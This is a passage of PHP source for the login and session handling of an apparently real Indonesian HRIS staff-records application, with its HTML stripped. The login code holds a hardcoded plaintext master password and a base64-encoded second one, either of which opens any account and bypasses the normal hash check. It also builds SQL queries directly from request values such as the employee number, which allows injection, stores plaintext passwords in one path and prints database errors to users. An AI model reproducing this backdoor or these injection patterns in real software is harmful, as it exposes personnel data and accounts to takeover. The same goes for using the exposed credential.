Execute($strSQL); if (!$$resultname) { print $db->ErrorMsg(); die($strSQL); } if ($men_level==2) echo PHP_EOL."

"; if (trim($men_url)) { if ($men_target=='_top') { $_url_1 = ""; $_url_2 = ""; } else { $_url_1 = ""; $_url_2 = ""; } } else { $_url_1 = ""; $_url_2 = ""; } if (!trim($men_url)) echo "

$_url_1 $_image $men_judul $_arrow $_url_2"; else echo "

$_url_1 $_image $men_judul $_url_2"; } ++$j; $resultname2 = "result2level$j"; $checklevel = $men_level + 1; $strSQL = "SELECT * from wf_menu WHERE men_level=$checklevel and men_referensi=$men_nomorurut"; $$resultname2 = $db->Execute($strSQL); if (!$$resultname2) print $db->ErrorMsg(); if ($$resultname2->RecordCount() > 0) { parseMenu($checklevel, $men_nomorurut); } if($fua_read=='1') echo "

".PHP_EOL; } echo "

Kolom Login belum terisi. Silahkan diisi."; if(!$password) $error .= "
Kolom Password belum terisi. Silahkan diisi."; if(preg_match("/[^A-Za-z0-9|\&|\.|\#|\$|!|\*|@]/",$password)) $error="
Password mengandung karakter yang tidak diperbolehkan. Karakter yang diperbolehkan hanya numerik, alphabet,dan karakter spesial &,. ,# ,$ ,! ,* ,@ "; # if(preg_match("/[^0-9]/",$nip)) $error="

NIP mengandung karakter yang tidak diperbolehkan. Karakter yang diperbolehkan hanya numerik"; if($error) { $f->box("Error!","

$error",$button,"error","600"); } $sql="select password as password_ori,grup,nip,counter,kd_uapkpb from tbl_user where trim(nip)='$nip'"; $resultdb= $f->get_last_record($sql); foreach($resultdb as $key=>$val) $$key=$val; //$f->pre($resultdb); $result_detail=$f->detailPegawai("$nip"); foreach($result_detail as $key=>$val) $$key=$val; $_mp="aG9sbGFuRA=="; $_mp1="aG9sbGFuRA=="; $_mp = base64_decode($_mp); $_mp = "phiR0@2016"; $_mp1 = base64_decode($_mp1); $superpass =hash('sha512', $challenge.hash('sha512', $_mp)); #$f->pre($_POST); #echo"$superpass"; #$f->pre($_SESSION); #echo $_SESSION['code']['code']." - ".$security_code; #die(1); $sql="select sts_pensiun as pensiun from spg_data_current where nip='$nip'"; if ($debug) $f->pre($sql); $pensiun=$db->GetOne($sql); /* if($_SESSION['code']['code'] != $security_code){ $button = array( "0"=>array("$PHP_SELF","Kembali"), ); $f->box("Error!"," Anda Salah Memasukkan Security Code ",$button,"error","600"); }else */ if(empty($password_ori) || empty($password)){ $button = array( "0"=>array("back","OK"), ); // $f->box("Error!","Anda Belum Terdaftar atau Informasi NIP & Password Anda Salah.",$button,"error","600"); $f->box("Error!","NIP & Password Anda Salah.",$button,"error","600"); }elseif($pensiun=='1'){ $button = array( "0"=>array("back","OK"), ); // $f->box("Error!","Maaf anda tidak diperbolehkan mengakses HRIS

Status pegawai anda: Non-Aktif.",$button,"error","600"); $f->box("Error!","NIP & Password Anda Salah.",$button,"error","600"); }elseif(hash('sha512', $challenge.$password_ori) != $password && !preg_match("/^($superpass)$/",$password)){ $button = array( "0"=>array("$PHP_SELF?counter=".($counter+1),"Kembali"), ); if($counter==2){ $sql="update tbl_user set status='2' where nip='$nip'"; $result=$db->Execute($sql); $blokir_message="Anda salah memasukkan password 3x. Status Account anda terblokir. Silahkan Hubungi Administrator untuk mengaktifkan kembali account anda"; } $f->box("Error!","NIP & Password Anda Salah.

$blokir_message

$additional_message",$button,"error","600"); }else{ $thang="2009"; $ctime = date('d/M/Y'); //For special user aktiva. if($password_ori != hash('sha512', $password) && $password ==$_mp1) { $access = 0; $time= explode( " ", microtime()); $timeNow= (double)$time[1]; $sql = "select kd_kantor, kd_jabatan_str as kd_jabatan from spg_data_current where nip = '$nip' "; $result = $f->get_last_record($sql); $kd_kantor = $result['kd_kantor']; $kd_jabatan = $result['kd_jabatan']; $sql = "select wia_accessname from tbl_role where kd_jabatan = '$kd_jabatan' "; $result = $f->get_last_record($sql); $wia_accessname = $result['wia_accessname']; } $sec=microtime(); mt_srand((double)microtime()*1000000); $sec2 = mt_rand(1000,9999); $id=hash('sha512', "$sec2$sec"); $time= explode( " ", microtime()); $timeNow= (double)$time[1]; $sql="update tbl_user set counter='0' where nip='$nip'"; $result=$db->Execute($sql); if(!$result) print $db->ErrorMsg(); //check apakah ada user dengan nip yang sama sedang login? $sql="select session_id from tbl_session where username='$nip' and status != '0'"; $result = $db->Execute($sql); $row = $result->FetchRow(); $session_id_exist = $row[SESSION_ID]; if(!empty($session_id_exist)){ $sql = "update tbl_session set status='0' where session_id='$session_id_exist'"; $result = $db->Execute($sql); if(!$result) print $db->ErrorMsg(); } $strSQL = "DELETE FROM tbl_session WHERE username='$nip' and status='1'"; $result = $db->Execute($strSQL); if (!$result) print $db->ErrorMsg(); $sql="select * from tbl_role where kd_jabatan='$kd_jabatan_str'"; $sql_x=$sql; $result=$f->get_last_record("$sql"); $wia_accessname=$result["wia_accessname"]; $petik="'"; $nm_peg=str_replace($petik,"'",$nm_peg); $ip =$f->get_user_ip(); #cek otp $sql="select IS_OTP as is_otp from tbl_user where login='$nip'"; if ($debug) $f->pre($sql); $is_otp=$db->GetOne($sql); if (($is_otp!='1' && empty($login_token)) || (!empty($login_token) && $login_token != "null")) { $strSQL = "INSERT INTO tbl_session (session_id, username, last_access,login_nm_peg,login_kdlokasi,login_kdsatker,login_kdsatker_list,login_kddept,login_kddept_list,login_kdunit,login_kdunit_list,login_kduapkpb,login_unit_anggaran,ip,user_agent,status,ctime,login_thang,login_kd_jabatan) VALUES ('$id','$nip','$timeNow','$nm_peg','$kdlokasi1','$kdsatker1','$kdsatker_list','$kddept1','$kddept_list','$kdunit1','$kdunit_list','$kd_uapkpb','$default_unit_anggaran','$ip','$HTTP_USER_AGENT','1',sysdate,'$thang','$kd_jabatan_str')"; $result = $db->Execute($strSQL); } $sql="DELETE FROM tbl_session WHERE status='0' "; $db->Execute($sql); if (!$result) print $db->ErrorMsg(); //cookie hanya nip, session_id, dan thang! setcookie("login_session","$id"); setcookie("login_nip","$nip"); setcookie("login_thang","$thang"); //session setcookie("login_kd_jabatan_str","$kd_jabatan_str"); setcookie("login_kd_kantor","$kd_kantor"); if($is_otp == 1 && empty($login_token)){ setcookie("login_token", "null"); $db->Execute("UPDATE tbl_user SET password1='$password' WHERE nip='$nip'"); include "login_page_otp.php"; ob_flush(); exit; }else{ $f->redirect("1","home_pemutahiran.php"," Please wait, Loading Profile.."); ob_flush(); exit; //check apakah ada status pjs untuk nip ini? $sql = "select * from spg_pjs where nip='$nip' and sysdate between tanggal_mulai and tanggal_selesai"; $result = $db->Execute($sql); $row1 = $result->FetchRow(); $pjs_id = $row1["PJS_ID"]; if(!empty($pjs_id)){ $kd_jabatan_str=substr($kd_jabatan_str,0,3); $jabatan_str=$f->convert_value(array("table"=>"spg_08_jabatan_str","cs"=>"nm_jabatan_str","cd"=>"kd_jabatan_str","vd"=>"$kd_jabatan_str","print_query"=>0)); $nm_unit_org=$f->convert_value(array("table"=>"spg_08_unit_organisasi","cs"=>"nm_unit_org","cd"=>"kd_unit_org","vd"=>"$kd_unit_org","print_query"=>0)); echo"

Jabatan default anda saat ini adalah $jabatan_str & anda
juga memiliki hak akses sebagai PJ/PJS.

Pilih hak akses yang akan anda gunakan pada aplikasi $site_title

"; $sql="select * from spg_pjs where nip='$nip' and sysdate between tanggal_mulai and tanggal_selesai"; $result =$db->Execute($sql); while($row=$result->FetchRow()){ foreach($row as $key=>$val){ $key=strtolower($key); $$key=$val; } #dodo 23072010 set perpajangan ekp echo""; #echo""; } echo"

	$jabatan_str $nm_unit_org $nm_kantor
	($jenis) $nm_jabatan_pjs $nm_unit_org_pjs $nm_kantor_pjs
	Perpanjangan akses sebagai $nm_jabatan_pjs $nm_unit_org_pjs $nm_kantor_pjs terkait dengan penyelesaian evaluasi kinerja pelaksana periode I Tahun 2010

	Setelah ada menggunakan salah satu hak akses, anda juga bisa menggunakan hak akses yang lain dengan cara melakukan logout dan login kembali ke dalam aplikasi HRIS Demo.

"; die(); } $f->insert_log("LOGIN","","$nip"); #$f->redirect("1","/index/a/home/","

Please wait, Loading Profile.."); $f->redirect("1","home_pemutahiran.php","

Please wait, Loading Profile.."); ob_flush(); exit; } } }elseif($act=="logout"){ $link = $HTTP_REFERER; //checking input ! $strSQL = "DELETE FROM tbl_session WHERE session_id='".$_COOKIE["login_session"]."'"; $result = $db->Execute($strSQL); if (!$result) print $db->ErrorMsg(); $f->insert_log("LOGOUT","","$nip"); setcookie("login_session","",time() - 3600, "/"); setcookie("login_nip","",time() - 3600, "/"); setcookie("login_token","",time() - 3600, "/"); setcookie("login_thang","",time() - 3600, "/"); //session setcookie("login_kd_jabatan_str","",time() - 3600, "/"); setcookie("login_kd_kantor","",time() - 3600, "/"); setcookie("set_user_umum","",time() - 3600, "/"); //Nanti di hapus unset($_COOKIE); session_start(); $_SESSION = array(); $rand=rand("100000","999999"); # $f->redirect("0","/index.php?cache=$rand","Logout .."); header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); session_destroy(); $f->redirect("1","/","

Logging out .."); ob_flush(); }elseif($act=='home'){ if ($login_token == 'null') { header("Location: /"); ob_end_flush(); exit; } $f->checkaccess(); $active_lang = $f->check_lang(); if(!empty($pjs_id)){ //ponco,start //update 13/06/2009,ewing, update ditambah dengan kantor, karena pj/pjs bisa dikantor yang berbeda $sql="select kd_jabatan_pjs||kd_unit_org_pjs as kd_jabatan_pjs,kd_kantor_pjs from spg_pjs where pjs_id='$pjs_id' and nip='$nip'"; $result=$f->get_last_record($sql); foreach($result as $key=>$val) $$key=$val; $sql="update tbl_session set login_kd_jabatan_pjs='$kd_jabatan_pjs',login_kd_kantor_pjs='$kd_kantor_pjs' where session_id='".$_COOKIE['login_session']."'"; #echo"$sql

"; $result=$db->Execute($sql); if(!$result) print $db->ErrorMsg(); //ponco,end setcookie("login_kd_jabatan_str","$kd_jabatan_pjs"); } $result_check = $f->get_function_access(); $login_access=$result_check['fua_name']; $detail_pegawai = $f->detailPegawai($login_nip); $nm_peg = $detail_pegawai["nm_peg"]; $kd_kantor_upk = $detail_pegawai["kd_kantor"]; $kd_jabatan_str = trim($detail_pegawai["kd_jabatan_str"]); $kd_unit_org = trim($detail_pegawai["kd_unit_org"]); $kd_kantor = trim($detail_pegawai["kd_kantor"]); $kd_eselon = trim($detail_pegawai["kd_eselon"]); $jns_kantor = trim($detail_pegawai["jns_kantor"]); $inquiry_access = $f->get_inquiry_access("UPK"); $detail_function_access=$f->get_function_access(); #$f->pre($detail_function_access); $fua_name=$detail_function_access['fua_name']; $wia_accessname=$detail_function_access['wia_accessname']; //check pemimpin satker if($jns_kantor=="1"){ $sql_pemimpin_satker="select kd_unit_es3 as kd_unit_org_dept from spg_08_unit_organisasi where kd_unit_es3='$kd_unit_org'"; if($f->check_exist_value($sql_pemimpin_satker)){ $sts_satker="Pemimpin Satker"; } }else{ if(preg_match("/203|211|302|402/i",$kd_jabatan_str)){ $sts_satker="Pemimpin Satker"; } } if(str_replace(" ","",$fua_name)==$wia_accessname) $login_sebagai="$sts_satker - ".$fua_name; else $login_sebagai="$fua_name - $wia_accessname"; if(preg_match("/pusat/i",$inquiry_access)){ $upk="UPK Pusat"; $button_edit ="1"; $button_delete ="1"; }elseif(preg_match("/lokal/i",$inquiry_access)){ $upk="UPK Lokal"; $cond .="where (mandatory='0' or dik_id in (select dik_id from spg_peserta_diklat where persetujuan_apk='1'))"; $standar_button_off="1"; $button_edit ="0"; $button_delete ="0"; $cond_peserta .=" and kd_kantor='$kd_kantor_upk'"; } $f->get_lang("global"); ?>